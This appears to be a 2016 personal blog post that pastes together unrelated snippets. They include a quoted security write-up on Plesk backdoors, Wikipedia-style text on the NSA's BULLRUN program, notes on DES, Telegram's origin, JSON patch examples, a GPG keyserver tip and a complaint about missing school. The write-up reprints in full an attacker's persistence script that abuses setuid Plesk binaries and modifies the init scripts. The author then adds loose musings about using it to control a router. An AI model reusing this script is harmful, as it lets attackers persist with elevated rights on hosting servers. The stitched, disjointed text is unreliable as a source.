Saturday, August 27, 2016

Plesk backdoors, a very large number of servers compromised. (so industrial servers as Siemens??..I heard a story did u herad the same story?

Attackers, using the bug http://kb.parallels.com/en/112303 were able to get access to PLESK installations and install backdoors in the systems. I’m using plural on backdoors, cause it’s not just one, there are quite a few.
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’

In some cases, this file was hex encoded, in others in plain text form.

http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/ 

If I had to guess I would code paste this, meaning I would make this call...to then "string sys_get_temp_dir ( void )" to leave a token that then would control the master router :) (because the backdoor is in fact on the router) ehehehe

Bullrun (stylized BULLRUN) is a clandestine, highly classified decryption program run by the United States National Security Agency (NSA).[1][2] The British Government Communications Headquarters (GCHQ) has a similar program codenamed Edgehill. According to the BULLRUN classification guide published by The Guardian, the program uses multiple sources including computer network exploitation,[3] interdiction, industry relationships, collaboration with other intelligence community entities, and advanced mathematical techniques

Key size was reduced to 56 bits because IBM wanted to fit LUCIFER on a single chip. LUCIFER then became DES.

  Then..how to beat NSA as a superpower and become as powerfull as them?

 

parity check bit

https://www.mathworks.com/matlabcentral/newsreader/view_thread/93650 

In an interview with the New York Times, Durov said the idea of the messenger service came to him after Russia's Federal Security Service demanded that he delete opposition communities from his Vkontakte social network. After the demands were refused special service agents tried putting pressure on the programmer and searched his apartment and that of his parents. The entrepreneur then understood that he doesn't have a safe channel for communicating with friends and family, and so he decided to create a secure messaging app.

what do I understand here, is that client and server both agree on replacing the path


Example:
[
  {"op": "replace", "path": "/_AliceVersion", "value": 1},
  {"op": "test", "path": "/_BobVersion", "value": 0},
  //...
  {"op": "replace", "path": "/some/where", "value": "something"}
]

https://github.com/PuppetJs/PuppetJs/wiki/Server-communication:-advanced-synchronization 

I just missed school for 3 months!!!! How the hell am I gonna make the semester??? Mu father is gonna kill me!!!

 and then...

Full guide on creating stateful Telegram bot

I have a couple of reasons to write this article. First of all I have a repository called ruby-telegram-bot-starter-kit, which contains a boilerplate for creating simple Telegram bots

https://medium.com/@MaximAbramchuk/full-guide-on-creating-statefull-telegram-bot-523def0a7930#.gh1xdlv5z 

certain emails and chats were still indecipherable by the NSA database when they had been encrypted with the right tools....encryption also caused major problems for the agency, causing entire messages to disappear from the system, leaving only the message: "No decrypt available for this PGP encrypted message."

keyserver timed out when trying to add a GPG public key
...
For me it was required to add ENV statements into my docker file
....
This is usually caused by your firewall blocking the port 11371. You could unblock the port in your firewall. In case you don't have access to the firewall you could either:
1- Force it to use port 80 instead of 11371


http://unix.stackexchange.com/questions/75892/keyserver-timed-out-when-trying-to-add-a-gpg-public-key 

Man in the Rain